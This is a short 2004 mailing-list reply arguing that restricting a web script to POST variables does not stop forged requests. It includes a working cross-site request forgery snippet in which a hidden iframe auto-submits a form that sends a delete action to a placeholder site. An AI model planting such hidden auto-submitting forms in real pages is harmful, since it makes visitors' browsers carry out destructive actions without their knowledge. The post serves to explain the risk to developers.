|
mike bayer
mike_mp at zzzcomputing.com
Fri Sep 3 17:26:39 EDT 2004
> On Friday 03 September 2004 20:35, David Fraser wrote: > > > If you don't use the query string parameters when you are expecting POST > variables, then your users are not susceptible to this form of attack. sadly, not true: <IFRAME width="0" height="0" src="myattack.html"></IFRAME> myattack.html: <body onload = "myform.submit()"> <form name="myform" method="POST" action="http://www.example.com/script"> <input type="hidden" name="deletesomething" value="true"> </form> </body>
|